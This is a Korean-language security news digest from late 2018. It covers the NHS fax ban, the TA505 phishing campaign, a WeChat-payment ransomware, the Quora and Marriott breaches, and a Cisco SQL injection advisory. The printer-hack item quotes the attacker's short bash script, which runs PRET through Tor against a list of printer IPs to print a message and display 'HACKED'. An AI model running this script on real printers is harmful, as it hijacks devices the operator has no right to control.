해외 보안 트렌드

요약

- 다음 달부터 새로운 팩스기기 구매를 전면 금지, 2020년 3월 31일까지 단계적으로 팩스 사용을 전면 금지

- 수기 처방전을 모두 전자화하여 민감한 정보를 보호하는 것이 필요. 보안이 취약한 팩스기계를 통해 중요 문서가 전달되는 것을 방지. 

- 팩스 사용 대신 모든 문서는 보안이 되는 이메일 등을 사용하도록 명령.

- 영국 국민보건서비스(National Health Service(NHS))는 영국 전역에 걸쳐 9000대의 팩스 기계를 사용 중. 

- 현재 10곳 중 4곳이 팩스를 통해 환자의 개인 정보, 진료 기록 등의 중요 문서들이 계속 전송되고 있음.

- 커뮤니케이션 시스템을 모두 전자화할 시, 사이버 테러에 따른 피해가 매우 클 것이라는 우려도 있음

영향성

현재 각국 공공기관에서 기밀 문서들이 보안에 취약한 팩스를 통해 전달되고 있어, 이에 대한 방안이 필요할 것으로 예상

참고자료

출처: https://www.bbc.com/news/uk-46497526

  https://www.theguardian.com/society/2018/dec/09/nhs-banned-from-buying-any-more-fax-machines

요약

- 과거 공격 패턴과는 다르게 미국 대형 소매상, 음식점, 슈퍼마켓 대상으로 FlawedAmmyy remote access Trojan과 Remote Manipulator System 

  소프트웨어 설치 파일을 첨부한 이메일 이용해 제한적 공격 실시.

- FlawedAmmyy : 유명한 원격 데스크탑 Ammy Admin의 유출된 소스 코드를 이용해 개발된 Trojan

- Remote Manipulator System(RMS) : TeamViewer와 유사한 원격 데스크톱 유틸리티

- 올해 7월 FlawedAmmyy RAT를 이용한 공격이 처음 탐지.

- 개인화된 악성 페이로드 : TA505의 공격 이메일은 Ricoh 브랜드 프린터로 스캔한 문서를 보낸 메시지처럼 디자인 됨.

   스캔된 문서는 사실 악성 MS Word 첨부파일임. 악성 Word 파일은 공격대상 맞추어 해당 회사의 브랜드 로고 등을 포함함

   또한 Macro를 삽입해 MSI 파일을 다운로드하고 실행하게 함 (MSI : 마이크로소프트 설치 파일, 윈도우 업데이트나 윈도우 프로그램 설치 

   파일로 사용됨)

- TA505는 최근 4년간 활발한 활동을 펼치고 있으며 과거  Dridex, Locky 랜섬웨어 공격의 주범으로 알려져 있음.

영향성

미국에 대한 제한적 공격이나, 피싱 공격이 급감하는 크리스마스 시즌에 주의 필요

참고자료

출처: https://threatpost.com/ta505-crooks-are-now-targeting-us-retailers-with-personalized-campaigns/139702/

요약

-2018년 유럽 블랙햇에서 Toyota 정보 기술 센터(Info Technology Center)의 Tsuyoshi Toyama, Takuya Yoshida가 이동식 자동차 보안 테스트기(PASTA(Portable Automotive Security Testbed)) 발표

-실제 자동차를 사용하지 않아 테스트 환경의 제약에서 자유로울 수 있는 오픈소스 테스팅 플랫폼.

(자세한 기술은 추후  Github을 통해 공개할 예정이며, 완성된 시스템은 일본에서 첫 시판에 나설 것)

-기기정보 : 무게 8kg, 서류가방크기, 이동식 테스트기

4개의 ECU(engine control unit)탑재, LED 패널(자동차 시스템 테스트 시 사용 - 메세지 보기 등), ODBII, RS232 포트, 바이너리 해킹을 위한 포트 제공

-기능 :  자동차 안전 테스팅 플랫폼 제공해 원격으로 바퀴, 브레이크, 창문, 등의 각종 자동차 기능 제어 가능

* 2015 블랙햇 미국에서 Charlie Miller and Chris Valasek가 Chrysler사의 Jeep 자동차의 wifi를 해킹해 주행중인 상태에서 제어 성공.

(주행 중 차량의 멀티미디어 제어(음악 재생), GPS 네비게이션 시스템을 통해 차량 추적, CAN 버스(차량 내부 네트워크로 엔진, 트랜스미션, 센서 등과 연결됨)에 명령어를 보내 차량 제어 가능).

해킹 발표 후 Chrysler사는 140만대의 차를 리콜함.

영향성

자동차 보안 테스팅을 오픈 소스로 개발함에 따라 자동차업계와 보안업계에서 이슈화 되고 있음

참고자료

출처 : https://www.darkreading.com/vulnerabilities---threats/toyota-builds-open-source-car-hacking-tool/d/d-id/1333415

블랙햇발표PPT : https://i.blackhat.com/eu-18/Wed-Dec-5/eu-18-Toyama-PASTA-Portable-Automotive-Security-Testbed-with-Adaptability[1].pdf

2015Jeep해킹 : https://www.kaspersky.com/blog/blackhat-jeep-cherokee-hack-explained/9493/

요약

-지난 4일동안 새로운 랜섬웨어가 등장하며 100,000대 이상의 중국 PC를 감염시킴

-중국 웹사이트와 포럼을 통해 전파되며 감염 수는 현재도 증가 중.

-특징 :

º 기존 랜섬웨어처럼 비트코인을 지불 수단으로 사용 하지 않음 

º  중국에서 가장 유명한 메시지 앱인 WeChat 페이를 통해 110위안(한화 1만 8천원)을 지불 요구

º  중국 사용자에 국한한 공격.

º  랜섬웨어는 감염된 시스템의 gif, exe, tmp 확장자 파일을 제외한 모든 파일을 암호화 함.

º 랜섬웨어 공격과 함께 웹사이트의 사용자 비밀번호 탈취함

   (Alipay, NetEase 163 email service, Baidu Cloud Disk, Jingdong (JD.com), Taobao, Tmall ,    AliWangWang, and QQ website)

º  Supplychain 공격(“EasyLanguage”라는 어플리캐이션 개발자들이 많이 사용하는 소프트웨어에 악성 코드를 삽입해서 퍼뜨림)

º  악성 소프트웨어를 사용해 개발된 모든 앱에 랜섬웨어가 삽입되어 퍼지게 됨.

º  백신에 탐지되는 것을 막기 위해, 신뢰되는 디지털 사인(예, Tencent Game, League of Legends, tmp, rtl 등의 프로그램)을 도용

-공격 과정 : 

랜섬웨어에 감염 -> 파일 암호화 함, 동시에 중국 웹사이트와 소셜 미디어 계정 비밀번호, 시스템 정보(CPU모델, 화면 해상도, 네트워크 정보, 설치된 소프트웨어 이름) 탈취 -> 랜섬웨어 팝업이 뜨면서 110위안을 공격자의 WeChat 계정으로 3일안에 보낼 것을 요구->기간 내 지불하지 않을 시 해독키를 삭제하겠다는 메시지를 C&C서버에서 자동으로 보냄

-조사 결과, 공격자가 해독키를  감염 PC에 저장해 놓은 것이 발견 됨

(경로:%user%\AppData\Roaming\unname_1989\dataFile\appCfg.cfg)

-중국 보안회사 Velvet Threat Intelligence (火绒威胁情报系统)는 무료 랜섬웨어 해독툴을 만들어 배포하고 공격자의 C&C에 접근해 MySQL DB서버에 저장된 수천 개의 도난 개인 정보를 발견

-공격자: ""lsy resource assistant"" and ""LSY classic alarm v1.1"" 등의 어플리케이션을 개발한 Luo 라는 소프트웨어 프로그래머로 추정. 

-WeChat은 현재 공격자의 지불수단 계정 사용을 금지함

영향성

지불 방법이 중국 WeChat을 이용하고 중국기반 앱 사용자를 대상으로 한 제한적인 공격임.

참고자료

출처: https://thehackernews.com/2018/12/china-ransomware-wechat.html

  https://www.zdnet.com/article/over-20000-pcs-infected-with-new-ransomware-strain-in-china/

요약

-Quora는 지식인과 같은 문답 형식의 가장 큰 사이트 중의 하나.

-지난 금요일, 해커는 서버에 접근해 1억명에 달하는 사용자의 정보를 탈취함. 

-유출내용 : 계정정보(이름,이메일 주소, 암호화된 비밀번호, 사용자가 인증 시 네트워크의 링크를 통해 불러올 수 있는 데이터), 

    홈페이지 내 콘텐츠   (질문, 답, 공감투표(upvotes)), 비공개 콘텐츠(답변 요청, 비공감투표(downvotes), 다이렉트메세지)

-Quora측에 따르면 신용카드나, 신원번호 등을 수집하지 않기 때문에, 데이터 유출로 인해 신분도용 발생이 일어날 확률은 희박함.

-유출 피해자는 로그인시 비밀번호를 새롭게 지정하도록 되어있음

-현재 디지털 포렌식 팀과 함께 정확한 데이터 유출 경위를 조사 중

영향성

Quora 계정 사용자는 비밀번호 변경 필요

참고자료

출처: https://www.zdnet.com/article/quora-discloses-mega-breach-impacting-100-million-users/#ftag=RSSbaffb68

 https://techcrunch.com/2018/12/03/quora-says-100-million-users-may-have-been-affected-by-data-breach/

요약

-지난 금요일 Marriott 호텔은: 최대 5억명의 고객 정보가 유출됐다고 밝힘.

-발표 후, 미국 오레곤 주와 메리랜드 주에서 데이터 유출에 대한 책임을 묻는 소송을 제기

-125억 달러를 비용과 유출에 대한 손해배상으로 지불할 것을 요구(총 5억명에게 25달러씩 지불)

-유출사건 경위: 

9월 8일: 내부 보안 장비에 투숙객 예약 데이터베이스에 비인가된 접속 시도가 탐지. 

11월19일: 비인가된 접속을 통해 예약과 관련한 투숙객의 정보 유출되었다는 것을 확인. 최초 유출 시점은 2014년.

11월30일: 금요일 데이터 유출사건 공식 발표. 

-유출데이터 : 3억2700명의 이름, 주소, 휴대전화번호, 이메일 주소, 여권 번호, 생년월일, 성별, 도착/출발 정보, 예약 날짜, 선호하는 연락방법 등이 유출됨. 일부 고객은 결제에 사용된 신용카드 번호와 카드 유효기간 까지 유출.

*Marriott의 Starwood 브랜드 호텔에서 지난 4년간 숙박했던 고객이 피해를 입음.

-주요 Starwood 브랜드 호텔: W Hotels, St. Regis, Sheraton Hotels & Resorts, Westin Hotels & Resorts, Element Hotels, Aloft Hotels, The Luxury Collection, Tribute Portfolio, Le Méridien Hotels & Resorts, Four Points by Sheraton and Design Hotels.

-2016년 Yahoo 데이터 유출(30억명 데이터유출)이후 가장 큰 데이터 유출 사건임.

-데이터 유출 사건 발표 후 Marriot 주가는 최대 8.7% 하락함. 

영향성

최근 4년간 Marriott 브랜드 호텔 투숙한 경우 비밀번호 변경할 것.

참고자료

출처: https://thehackernews.com/2018/11/marriott-starwood-data-breach.html

https://www.zdnet.com/article/marriott-sued-hours-after-announcing-data-breach/#ftag=RSSbaffb68

요약

-전 세계의 50,000개 프린터를 스웨덴 기반 비디오 게임 리뷰어/코미디언 Felix Kjellberg(트위터 계정:@TheHackerGiraffe)가 해킹해 PewDiePie 유투브 채널 홍보

-해킹목적은 채널 홍보와 프린터 보안의 취약성을 알리기 위함.

-해커는 Shodan.io 의 검색 기능을 사용하여 9100 포트가 열려있는 프린터를 찾아 공격. 

-Printer Exploitation Toolkit(PRET)을 사용해 공격.

-PRET을 이용하면 프린터를 기점으로 파일 탈취, 멀웨어 설치, 내부 네트워크에 접근이 가능하고 프린터에 물리적 손상을 입힐 수 있음

-공격 스크립트:

#!/bin/bash

while read -r line; do

    ip=""$line""

    torify ./PRET/pret.py $ip pjl -q -i ./commands.txt

done < ""./potential_bros.txt""

<commands.txt>

print ./message.pdf

display HACKED

quit

-공격을 당한 프린터는 해커가 작성함 message.pdf 파일을 인쇄 함.

영향성

공격은 단순한 장난에서 시작됐지만, IoT장비의 보안 중요성을 강조

참고자료

Felix Kjellberg 트위터계정: https://twitter.com/HackerGiraffe/status/1068717289124634624

PRET툴: https://github.com/RUB-NDS/PRET

출처: https://www.hackread.com/printers-hacked-to-promote-pewdiepie-youtube-channel/

요약

- 취약점 : Cisco Prime License Manager(PLM)의 웹 코드에 인증 받지 않은 원격 공격자가 임의의 SQL쿼리를 실행할 수 있음. 

공격자는 어플리케이션에 영향을 줄 수 있는 악의적인 SQL 구문이 포함한 HTTP POST 요청을 보내 공격.

공격 성공 시, PLM 데이터베이스의 임의의 데이터를 수정하거나 지울 수 있고 postgres 유저 권한으로 쉘 접근이 가능함. 

- 취약원인: 사용자 인풋 SQL 쿼리의 부족한 검증

- 심각도 : Critical

- CVSS Score: Base 9.4

- 해당제품 : Cisco Unified Communications Manager, Cisco Unity Connection

- 해당버전 : Cisco Prime License Manager Releases 11.0.1 이상 버전

*Cisco Prime License Manager는 Cisco Unified Communications Manager와 Cisco Unity Connection을 설치하면 자동으로 설치됨

*PLM이 단독으로 설치 되었거나 번들로 설치된 두 경우 모두 해당

- 대응방안 : Cisco Prime License Manager Release 패치(ciscocm.CSCvk30822_v1.0.k3.cop.sgn)를 다운로드하여 수동으로 설치해야 함

관련 CVE정보

- CVE-2018-15441

- PoC : 현재(2018.11.30 15:00) 없음

탐지룰 존재유무

- 벤더룰 : SQL_Injection

영향성

벤더룰 탐지 가능하나 영향받는 버전 사용 시스템의 신속한 패치 필요

참고자료

출처: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181128-plm-sql-inject

https://threatpost.com/cisco-patches-critical-bug-in-license-management-tool/139481/